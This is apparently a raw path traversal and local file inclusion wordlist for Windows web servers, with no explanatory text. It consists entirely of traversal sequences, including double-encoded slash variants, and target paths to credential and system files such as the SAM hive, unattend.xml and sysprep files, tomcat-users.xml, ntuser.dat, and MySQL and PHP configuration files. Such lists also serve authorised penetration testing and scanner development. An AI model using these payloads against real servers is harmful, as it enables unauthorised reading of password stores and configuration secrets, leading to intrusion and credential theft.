/....\....\
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/xampp/webdav/webdav.txt
C:/windows/temp/
C:/windows/panther/unattend.xml
C:/windows/panther/unattended.xml
C:\WINNT\win.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
/..%%32%66..%%32%66..%%32%66..%%32%66
C:/xampp/tomcat/conf/web.xml
C:/windows/panther/unattend/unattend.txt
C:/windows/panther/sysprep.xml
C:/sysprep.xml

c:\WINNT\php.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
\apache2\log\error_log
.pass
c:\System32\Inetsrv\metabase.xml
/....\....\....\....\....\....\
C:/winnt/win.ini
C:/windows/repair/software
C:/windows/panther/unattend/sysprep.xml
C:/windows/notepad.exe
C:/unattend.xml
\xampp\tomcat\conf\web.xml
\log\error_log
C:\xampp\tomcat\conf\web.xml
/.\/\.\
/....\
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/windows/panther/unattend/unattend.xml
C:/windows/panther/unattended.txt
C:/windows/explorer.exe
wp-login.php
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
\apache2\log\error.log
d:\System32\Inetsrv\metabase.xml
c:\inetpub\wwwroot\index.asp
/....\....\....\....\
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/windows/win.ini
C:/windows/repair/sam
C:/windows/panther/unattend/setupinfo.bak
C:/unattended.xml
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/documents and settings/administrator/ntuser.dat
\logs\httpd\access_log
\log\access_log
C:\WINDOWS\win.ini
/....\....\....\....\....\....\....\....\
/..%%32%66..%%32%66
C:/windows/panther/unattend/unattended.txt
C:/windows/panther/setupinfo.bak
C:/windows/csc/v2.0.6/pq
C:/users/administrator/ntuser.dat
C:/sysprep/sysprep.inf
\xampp\webdav\webdav.txt
\log\httpd\access_log
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
\apache2\log\access_log
/..%%32%66..%%32%66..%%32%66
C:/xampp/tomcat/conf/tomcat-users.xml
C:/windows/panther/unattend/unattended.xml
C:/windows/panther/sysprep.inf
C:/windows/csc/v2.0.6/sm
C:/users/administrator/ntuser.ini
C:/sysprep/sysprep.xml
\log\httpd\error_log
C:\WINDOWS\win.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
c:\home\bin\stable\apache\php.ini
\apache2\log\access.log
C:\xampp\webdav\webdav.txt
C:\WINDOWS\win.ini
/....\....\....\....\....\
C:/windows/repair/security
C:/windows/panther/unattend/sysprep.inf
C:/unattend.txt
C:/documents and settings/administrator/ntuser.ini
\xampp\tomcat\conf\tomcat-users.xml
\logs\httpd\error_log
\log\access.log
c:\WINDOWS\php.ini
C:\xampp\tomcat\conf\tomcat-users.xml
c:\AppServ\MySQL
/..........................................................................\
/....\....\....\....\....\....\....\
/..%%32%66
C:/windows/panther/unattend.txt
C:/windows/panther/setupinfo
C:/users/administrator/desktop/desktop.ini
C:/sysprep.inf
\log\error.log
C:\WINDOWS\Repair\SAM
c:\NetServer\bin\stable\apache\php.ini
c:\home2\bin\stable\apache\php.ini
/....\....\....\
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:/windows/panther/unattend/setupinfo
C:/unattended.txt
C:/documents and settings/administrator/desktop/desktop.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini